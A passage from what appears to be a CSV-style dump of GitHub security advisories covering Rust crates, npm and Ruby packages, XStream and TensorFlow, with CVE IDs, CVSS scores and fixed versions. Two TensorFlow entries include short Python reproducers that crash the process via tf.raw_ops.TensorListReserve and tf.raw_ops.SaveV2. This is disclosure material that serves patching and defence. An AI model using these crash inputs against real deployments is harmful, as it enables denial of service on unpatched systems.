'https://github.com/rusqlite/rusqlite/commit/3c6b57fe1b2cc87e7ebecde43dd836ffb1c4ea5c'}, {'type': 'PACKAGE', 'url': 'https://github.com/rusqlite/rusqlite'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:08:12Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-3933-wvjf-pcvc,2023-06-13T20:06:37Z,2021-08-25T20:46:16Z,,['CVE-2020-35859'],Out of bounds access in lucet-runtime-internals,"An embedding using affected versions of lucet-runtime configured to use non-default Wasm globals sizes of more than 4KiB, or compiled in debug mode without optimizations, could leak data from the signal handler stack to guest programs. This can potentially cause data from the embedding host to leak to guest programs or cause corruption of guest program memory. This flaw was resolved by correcting the sigstack allocation logic.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lucet-runtime-internals'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.3'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'lucet-runtime-internals'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5.0'}, {'fixed': '0.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35859'}, {'type': 'WEB', 'url': 'https://github.com/bytecodealliance/lucet/pull/401'}, {'type': 'PACKAGE', 'url': 'https://github.com/fastly/lucet'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0004.html'}]","{'cwe_ids': ['CWE-125', 'CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:19:58Z', 'nvd_published_at': None}" +1.4.0,GHSA-369h-pjr2-6wrh,2023-06-13T22:25:06Z,2021-08-25T20:43:16Z,,['CVE-2018-20994'],Uncontrolled recursion in trust-dns-proto,There's a stack overflow leading to a crash when Trust-DNS's parses a malicious DNS packet. Affected versions of this crate did not properly handle parsing of DNS message compression (RFC1035 section 4.1.4). The parser could be tricked into infinite loop when a compression offset pointed back to the same domain name to be parsed. This allows an attacker to craft a malicious DNS packet which when consumed with Trust-DNS could cause stack overflow and crash the affected software.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'trust-dns-proto'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20994'}, {'type': 'PACKAGE', 'url': 'https://github.com/bluejekyll/trust-dns'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0007.html'}]","{'cwe_ids': ['CWE-674'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-r626-fc64-3q28,2023-06-13T22:20:26Z,2021-08-25T20:59:06Z,,['CVE-2020-36441'],Data race in abox,"Affected versions of this crate implements `Send`/`Sync` for `AtomicBox` without requiring `T: Send`/`T: Sync`. This allows to create data races to `T: !Sync` and send `T: !Send` to another thread. Such behavior breaks the compile-time thread safety guarantees of Rust, and allows users to incur undefined behavior using safe Rust (e.g. memory corruption from data race). The flaw was corrected in commit `34c2b9e` by adding trait bound `T: Send` to `Send` impl for `AtomicBox` and trait bound `T: Sync` to `Sync` impl for `AtomicBox`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'abox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36441'}, {'type': 'WEB', 'url': 'https://github.com/SonicFrog/abox/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/SonicFrog/abox/pull/2'}, {'type': 'WEB', 'url': 'https://github.com/SonicFrog/abox/commit/34c2b9e'}, {'type': 'PACKAGE', 'url': 'https://github.com/SonicFrog/abox'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/abox/RUSTSEC-2020-0121.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0121.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:56:03Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-5rc4-8qqh-vq7f,2023-09-12T20:58:59Z,2021-08-09T22:24:26Z,,['CVE-2018-3718'],vercel/serve allows access to restricted files if filename is URL encoded.,serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'serve'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-3718'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/308721'}, {'type': 'PACKAGE', 'url': 'https://github.com/vercel/serve'}]","{'cwe_ids': ['CWE-177'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T22:24:10Z', 'nvd_published_at': '2018-06-07T02:29:00Z'}" +1.4.0,GHSA-pf3p-x6qj-6j7q,2023-06-13T18:42:58Z,2021-08-25T20:50:33Z,,['CVE-2020-35922'],mio invalidly assumes the memory layout of std::net::SocketAddr,"The mio crate has assumed std::net::SocketAddrV4 and std::net::SocketAddrV6 have the same memory layout as the system C representation sockaddr. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'mio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '0.7.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35922'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/mio/issues/1386'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/mio/pull/1388'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/mio/commit/152e0751f0be1c9b0cbd6778645b76bcb0eba93c'}, {'type': 'PACKAGE', 'url': 'https://github.com/tokio-rs/mio'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0081.html'}]","{'cwe_ids': ['CWE-188'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:54:14Z', 'nvd_published_at': None}" +1.4.0,GHSA-9f5r-vqm5-m342,2023-06-13T20:06:12Z,2021-08-25T20:53:16Z,,['CVE-2021-26952'],Use of Uninitialized Resource in ms3d,"Affected versions of this crate passes an uninitialized buffer to a user-provided Read implementation. Arbitrary Read implementations can read from the uninitialized buffer (memory exposure) and also can return incorrect number of bytes written to the buffer. Reading from uninitialized memory produces undefined values that can quickly invoke undefined behavior. + +The flaw was fixed in commit `599313b` by zero-initializing the buffer (via self.buf.resize(len, 0)) before passing it to Read.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ms3d'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26952'}, {'type': 'WEB', 'url': 'https://github.com/andrewhickman/ms3d/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/andrewhickman/ms3d/commit/599313b'}, {'type': 'PACKAGE', 'url': 'https://github.com/andrewhickman/ms3d'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0016.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:44:22Z', 'nvd_published_at': None}" +1.4.0,GHSA-27j5-4p9v-pp67,2021-08-23T19:16:53Z,2021-08-25T14:43:40Z,,['CVE-2021-37644'],`std::abort` raised from `TensorListReserve`,"### Impact +Providing a negative element to `num_elements` list argument of `tf.raw_ops.TensorListReserve` causes the runtime to abort the process due to reallocating a `std::vector` to have a negative number of elements: + +```python +import tensorflow as tf + +tf.raw_ops.TensorListReserve( + element_shape = tf.constant([1]), + num_elements=tf.constant([-1]), + element_dtype = tf.int32) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/list_kernels.cc#L312) calls `std::vector.resize()` with the new size controlled by input given by the user, without checking that this input is valid. + +### Patches +We have patched the issue in GitHub commit [8a6e874437670045e6c7dc6154c7412b4a2135e2](https://github.com/tensorflow/tensorflow/commit/8a6e874437670045e6c7dc6154c7412b4a2135e2). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-27j5-4p9v-pp67'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37644'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8a6e874437670045e6c7dc6154c7412b4a2135e2'}]","{'cwe_ids': ['CWE-617'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T19:16:53Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-gppw-3h6h-v6q2,2021-08-19T17:26:00Z,2021-08-25T20:52:08Z,,['CVE-2021-28037'],Data race in internment,An issue was discovered in the internment crate before 0.4.2 for Rust. There is a data race that can cause memory corruption because of the unconditional implementation of Sync for Intern.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'internment'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28037'}, {'type': 'WEB', 'url': 'https://github.com/droundy/internment/issues/20'}, {'type': 'PACKAGE', 'url': 'https://github.com/droundy/internment'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0036.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:26:00Z', 'nvd_published_at': None}" +1.4.0,GHSA-f2c9-5jqw-3xh3,2023-09-05T21:59:59Z,2021-08-02T17:23:39Z,,['CVE-2021-28796'],Cross-Site Scripting in Qiita-Markdown,Increments Qiita-Markdown before 0.33.0 allows XSS in transformers.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'qiita-markdown'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.33.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28796'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-f2c9-5jqw-3xh3'}, {'type': 'PACKAGE', 'url': 'https://github.com/increments/qiita-markdown'}, {'type': 'WEB', 'url': 'https://github.com/increments/qiita-markdown/compare/v0.32.0...v0.33.0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/qiita-markdown/CVE-2021-28796.yml'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/15'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T17:23:26Z', 'nvd_published_at': '2021-03-18T16:15:00Z'}" +1.4.0,GHSA-whc7-5p35-4ww2,2021-08-19T20:54:21Z,2021-08-25T20:49:06Z,,['CVE-2020-35899'],Use after free in actix-service,An issue was discovered in the actix-service crate before 1.0.6 for Rust. The Cell implementation allows obtaining more than one mutable reference to the same data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'actix-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35899'}, {'type': 'WEB', 'url': 'https://github.com/actix/actix-net/pull/158'}, {'type': 'PACKAGE', 'url': 'https://github.com/actix/actix-net'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0046.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:54:21Z', 'nvd_published_at': None}" +1.4.0,GHSA-36cg-4jff-5863,2023-06-13T20:41:14Z,2021-08-25T20:59:13Z,,['CVE-2020-36446'],Data races in signal-simple,"Affected versions of this crate unconditionally implement Send/Sync for SyncChannel. SyncChannel doesn't provide access to &T but merely serves as a channel that consumes and returns owned T. + +Users can create UB in safe Rust by sending T: !Send to other threads with SyncChannel::send/recv APIs. Using T = Arc allows to create data races (which can lead to memory corruption), and using T = MutexGuard allows to unlock a mutex from a thread that didn't lock the mutex.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'signal-simple'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36446'}, {'type': 'WEB', 'url': 'https://github.com/kitsuneninetails/signal-rust/issues/2'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/signal-simple/RUSTSEC-2020-0126.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0126.html'}, {'type': 'PACKAGE', 'url': 'http://github.com/kitsuneninetails/signal-rust'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:44:31Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-qpgv-g792-wh6x,2021-08-19T17:21:25Z,2021-08-25T20:54:04Z,,['CVE-2021-29932'],Uncontrolled Resource Consumption in parse_duration,An issue was discovered in the parse_duration crate through 2021-03-18 for Rust. It allows attackers to cause a denial of service (CPU and memory consumption) via a duration string with a large exponent.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'parse_duration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29932'}, {'type': 'WEB', 'url': 'https://github.com/zeta12ti/parse_duration/issues/21'}, {'type': 'PACKAGE', 'url': 'https://github.com/zeta12ti/parse_duration'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0041.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:21:25Z', 'nvd_published_at': '2021-04-01T05:15:00Z'}" +1.4.0,GHSA-r43h-gmrm-h5c9,2021-08-19T21:21:41Z,2021-08-25T20:45:09Z,,['CVE-2020-25573'],Access of Uninitialized Pointer in linked-hash-map,"An issue was discovered in the linked-hash-map crate before 0.5.3 for Rust. It creates an uninitialized NonNull pointer, which violates a non-null constraint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'linked-hash-map'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25573'}, {'type': 'WEB', 'url': 'https://github.com/contain-rs/linked-hash-map/pull/100'}, {'type': 'PACKAGE', 'url': 'https://github.com/contain-rs/linked-hash-map'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0026.html'}]","{'cwe_ids': ['CWE-824'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:21:41Z', 'nvd_published_at': '2020-09-14T19:15:00Z'}" +1.4.0,GHSA-39wr-f4ff-xm6p,2023-06-13T21:56:16Z,2021-08-25T20:46:41Z,,['CVE-2019-25007'],Incorrect implementation in streebog,Internal update-sigma function was implemented incorrectly and depending on debug-assertions it could've caused an incorrect result or panic for certain inputs.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'streebog'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25007'}, {'type': 'WEB', 'url': 'https://github.com/RustCrypto/hashes/pull/91'}, {'type': 'PACKAGE', 'url': 'https://github.com/RustCrypto/hashes/tree/master/streebog'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0030.html'}]","{'cwe_ids': ['CWE-617'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:19:50Z', 'nvd_published_at': None}" +1.4.0,GHSA-vh4p-6j7g-f4j9,2021-08-19T20:49:28Z,2021-08-25T20:49:56Z,,['CVE-2020-35911'],Data races in lock_api,An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of MappedRwLockReadGuard unsoundness.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lock_api'}, 'ecosystem_specific': {'affected_functions': ['lock_api::MappedRwLockReadGuard']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35911'}, {'type': 'WEB', 'url': 'https://github.com/Amanieu/parking_lot/pull/262'}, {'type': 'PACKAGE', 'url': 'https://github.com/Amanieu/parking_lot'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0070.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:49:28Z', 'nvd_published_at': None}" +1.4.0,GHSA-vj72-mwrj-m2xq,2021-08-31T21:21:45Z,2021-08-10T16:09:25Z,,['CVE-2021-23417'],Prototype Pollution in deepmergefn,"All versions of package deepmergefn are vulnerable to Prototype Pollution via deepMerge function. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'deepmergefn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23417'}, {'type': 'PACKAGE', 'url': 'https://github.com/jesusgm/deepmergefn'}, {'type': 'WEB', 'url': 'https://github.com/jesusgm/deepmergefn/blob/master/index.js#23L6'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DEEPMERGEFN-1310984'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:38:21Z', 'nvd_published_at': '2021-07-28T16:15:00Z'}" +1.4.0,GHSA-j9h8-phrw-h4fh,2022-02-08T21:00:39Z,2021-08-25T14:48:19Z,,['CVE-2021-39144'],XStream is vulnerable to a Remote Command Execution attack,"### Impact +The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39144](https://x-stream.github.io/CVE-2021-39144.html). + +### Credits + +Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Email us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39144'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39144.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/169859/VMware-NSX-Manager-XStream-Unauthenticated-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-306', 'CWE-502', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:07Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-rh89-x75f-rh3c,2023-06-13T18:43:22Z,2021-08-25T20:44:00Z,,['CVE-2019-15553'],Exposure of uninitialized memory in memoffset,"Affected versions of this crate caused traps and/or memory unsafety by zero-initializing references. They also could lead to uninitialized memory being dropped if the field for which the offset is requested was behind a deref coercion, and that deref coercion caused a panic. The flaw was corrected by using MaybeUninit.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'memoffset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15553'}, {'type': 'WEB', 'url': 'https://github.com/Gilnaa/memoffset/issues/9#issuecomment-505461490'}, {'type': 'PACKAGE', 'url': 'https://github.com/Gilnaa/memoffset'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0011.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:23:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-wp77-4gmm-7cq8,2021-08-23T21:12:17Z,2021-08-25T14:43:29Z,,['CVE-2021-37648'],Incorrect validation of `SaveV2` inputs,"### Impact +The code for `tf.raw_ops.SaveV2` does not properly validate the inputs and an attacker can trigger a null pointer dereference: + +```python +import tensorflow as tf + +tf.raw_ops.SaveV2( + prefix=['tensorflow'], + tensor_name=['v'], + shape_and_slices=[], + tensors=[1,2,3]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/save_restore_v2_ops.cc) uses `ValidateInputs` to check that the input arguments are valid. This validation would have caught the illegal state represented by the reproducer above. + +However, the validation uses `OP_REQUIRES` which translates to setting the `Status` object of the current `OpKernelContext` to an error status, followed by an empty `return` statement which just terminates the execution of the function it is present in. However, this does not mean that the kernel execution is finalized: instead, execution continues from the next line in `Compute` that follows the call to `ValidateInputs`. This is equivalent to lacking the validation. + +### Patches +We have patched the issue in GitHub commit [9728c60e136912a12d99ca56e106b7cce7af5986](https://github.com/tensorflow/tensorflow/commit/9728c60e136912a12d99ca56e106b7cce7af5986). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 